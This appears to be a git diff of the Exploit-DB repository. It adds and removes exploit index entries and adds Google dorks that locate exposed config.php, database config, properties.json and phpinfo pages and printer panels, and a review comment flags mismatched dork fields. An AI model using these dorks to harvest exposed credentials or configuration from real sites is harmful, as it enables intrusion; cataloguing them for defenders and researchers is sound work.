44307,exploits/macos/local/44307.m,"Google Software Updater macOS - Unsafe use of Distributed Objects Privilege Escalation",2018-03-20,"Google Security Research",local,macos,,2018-03-20,2018-03-20,1,CVE-2018-6084,Local,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1486
43224,exploits/macos/local/43224.sh,"Hashicorp vagrant-vmware-fusion 4.0.23 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,,2017-12-06,2017-12-06,1,CVE-2017-11741,Local,,,,https://m4.rkw.io/blog/cve201711741-local-root-privesc-in-hashicorp-vagrantvmwarefusion--4023.html
43223,exploits/macos/local/43223.sh,"Hashicorp vagrant-vmware-fusion 4.0.24 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,,2017-12-06,2017-12-06,1,CVE-2017-12579,Local,,,,https://m4.rkw.io/blog/cve201712579-local-root-privesc-in-hashicorp-vagrantvmwarefusion-4024.html
@@ -14836,6 +14847,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48568,exploits/php/webapps/48568.py,"Bludit 3.9.12 - Directory Traversal",2020-06-09,"Luis Vacacas",webapps,php,,2020-06-09,2020-06-09,0,CVE-2019-16113,,,,,
48942,exploits/php/webapps/48942.py,"Bludit 3.9.2 - Auth Bruteforce Bypass",2020-10-23,"Mayank Deshmukh",webapps,php,,2020-10-23,2020-11-13,1,CVE-2019-17240,,,,,
49037,exploits/php/webapps/49037.rb,"Bludit 3.9.2 - Authentication Bruteforce Bypass (Metasploit)",2020-11-13,Aporlorxl23,webapps,php,,2020-11-13,2020-11-13,1,,,,,,
+51360,exploits/php/webapps/51360.txt,"Bludit 4.0.0-rc-2 - Account takeover",2023-04-14,nu11secur1ty,webapps,php,,2023-04-14,2023-04-14,0,,,,,,
46060,exploits/php/webapps/46060.txt,"bludit Pages Editor 3.0.0 - Arbitrary File Upload",2018-12-27,BouSalman,webapps,php,80,2018-12-27,2019-01-02,0,CVE-2018-1000811,,,,http://www.exploit-db.combludit-3.0.0.zip,
11360,exploits/php/webapps/11360.txt,"Blue Dove - SQL Injection",2010-02-08,HackXBack,webapps,php,,2010-02-07,,0,,,,,,
7797,exploits/php/webapps/7797.php,"Blue Eye CMS 1.0.0 - 'clanek' Blind SQL Injection",2009-01-15,darkjoker,webapps,php,,2009-01-14,2017-01-17,1,OSVDB-51769;CVE-2009-0425,,,,,
@@ -37231,7 +37243,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42997,exploits/windows/dos/42997.txt,"Microsoft Windows 10 - WLDP/MSHTML CLSID UMCI Bypass",2017-10-17,"Google Security Research",dos,windows,,2017-10-17,2017-10-17,1,CVE-2017-11823,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1328
47797,exploits/windows/dos/47797.c,"Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)",2019-12-20,vportal,dos,windows,,2019-12-20,2019-12-20,0,,,,,,
42007,exploits/windows/dos/42007.cpp,"Microsoft Windows 10 Kernel - 'nt!NtTraceControl (EtwpSetProviderTraits)' Pool Memory Disclosure",2017-05-15,"Google Security Research",dos,windows,,2017-05-15,2017-05-15,1,CVE-2017-0259,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1161
-51348,exploits/windows/dos/51348.txt,"Microsoft Windows 11 - 'cmd.exe' Denial of Service",2023-04-08,"Milad karimi",dos,windows,,2023-04-08,2023-04-08,0,,,,,,
20437,exploits/windows/dos/20437.c,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (1)",1997-07-05,_eci,dos,windows,,1997-07-05,2012-08-11,1,"CVE-1999-0153 ;OSVDB-1666",,,,,https://www.securityfocus.com/bid/2010/info
20438,exploits/windows/dos/20438.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (2)",1997-05-07,_eci,dos,windows,,1997-05-07,2012-08-11,1,CVE-1999-0153;OSVDB-1666,,,,,https://www.securityfocus.com/bid/2010/info
20439,exploits/windows/dos/20439.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (3)",1997-05-07,_eci,dos,windows,,1997-05-07,2012-08-11,1,CVE-1999-0153;OSVDB-1666,,,,,https://www.securityfocus.com/bid/2010/info
diff --git a/ghdb.xml b/ghdb.xml
index b68150a2d..df6ccf7b6 100644
--- a/ghdb.xml
+++ b/ghdb.xml
@@ -37156,6 +37156,22 @@ Google+ https://plus.google.com/u/0/114827336297709201563
2021-10-18Roshdy Essam
+
+ 8153
+ https://www.exploit-db.com/ghdb/8153
+ Files Containing Juicy Info
+ Google Dork: intitle:"index of" "properties.json"
+ # Google Dork: intitle:"index of" "properties.json"
+# Files Containing Juicy Info
+# Date: 13/04/2023
+# Exploit Author: Arnob Biswas
+
+ intitle:"index of" "properties.json"
+ https://www.google.com/search?q=intitle:"index of" "properties.json"
+
+ 2023-04-14
+ Arnob Biswas
+ 7303
https://www.exploit-db.com/ghdb/7303
@@ -40429,6 +40445,21 @@ Category: Files Containing Juicy Info
2022-09-19HackerFrenzy
+
+ 8155
+ https://www.exploit-db.com/ghdb/8155
+ Files Containing Juicy Info
+ intitle:"index of " "config/db"
+ # Google Dork: intitle:"index of" "properties.json"
+# Files Containing Juicy Info
+# Date: 13/04/2023
+# Exploit Author: Jerr279
+ intitle:"index of " "config/db"
+ https://www.google.com/search?q=intitle:"index of " "config/db"
+
+ 2023-04-14
+ Jerr279
+ 8132
https://www.exploit-db.com/ghdb/8132
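Review bot: The entry added for GHDB 8155 carries a header comment for a different dork: its text begins `# Google Dork: intitle:"index of" "properties.json"`, which is the 8153 entry's query, while the title, query and URL fields all give `intitle:"index of " "config/db"`; the comment should read `# Google Dork: intitle:"index of " "config/db"`. A similar mismatch is in the 8158 hunk, where the title and comment give `intitle:Web Image Monitor inurl:mainFrame.cgi` but the query and search-URL fields hold the free text `Google Dork: Recoh Printer Properties Page`. In the 8157 hunk the author is spelled both `Vitor Guaxi` and `Vitor guaxi`. The element tags are not visible in this view, so the field names used here are inferred from position.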
@@ -42654,6 +42685,21 @@ DORK: intitle:"index of" "config.js"
2021-10-04Suman Das
+
+ 8154
+ https://www.exploit-db.com/ghdb/8154
+ Files Containing Juicy Info
+ intitle:"index of" "config.php"
+ # Google Dork: intitle:"index of" "config.php"
+# Files Containing Juicy Info
+# Date: 13/04/2023
+# Exploit Author: Jerr279
+ intitle:"index of" "config.php"
+ https://www.google.com/search?q=intitle:"index of" "config.php"
+
+ 2023-04-14
+ Jerr279
+ 6048
https://www.exploit-db.com/ghdb/6048
@@ -49102,6 +49148,21 @@ Dxtroyer
2017-04-06anonymous
+
+ 8156
+ https://www.exploit-db.com/ghdb/8156
+ Files Containing Juicy Info
+ inurl:"/private" intext:"index of /" "config"
+ # Google Dork: inurl:"/private" intext:"index of /" "config"
+# Files Containing Juicy Info
+# Date: 13/04/2023
+# Exploit Author: Jerr279
+ inurl:"/private" intext:"index of /" "config"
+ https://www.google.com/search?q=inurl:"/private" intext:"index of /" "config"
+
+ 2023-04-14
+ Jerr279
+ 8152
https://www.exploit-db.com/ghdb/8152
@@ -52034,6 +52095,21 @@ Thanks & Regards
2021-01-07Rushabh Doshi
+
+ 8157
+ https://www.exploit-db.com/ghdb/8157
+ Files Containing Juicy Info
+ inurl:info.php intext:"PHP Version" intitle:"phpinfo()"
+ # Google Dork: inurl:info.php intext:"PHP Version" intitle:"phpinfo()"
+# Files containing juicy info.
+# Date: 13/04/2023
+# Exploit Author: Vitor Guaxi
+ inurl:info.php intext:"PHP Version" intitle:"phpinfo()"
+ https://www.google.com/search?q=inurl:info.php intext:"PHP Version" intitle:"phpinfo()"
+
+ 2023-04-14
+ Vitor guaxi
+ 4389
https://www.exploit-db.com/ghdb/4389
@@ -105922,6 +105998,21 @@ temperature, etc) can be found.
2006-10-02anonymous
+
+ 8158
+ https://www.exploit-db.com/ghdb/8158
+ Various Online Devices
+ intitle:Web Image Monitor inurl:mainFrame.cgi
+ # Google Dork: intitle:Web Image Monitor inurl:mainFrame.cgi
+# Various Online Devices
+# Date:14/04/2023
+# Exploit Author: Hasan Ali YILDIR
+ Google Dork: Recoh Printer Properties Page
+ https://www.google.com/search?q=Google Dork: Recoh Printer Properties Page
+
+ 2023-04-14
+ Hasan Ali YILDIR
+ 4200
https://www.exploit-db.com/ghdb/4200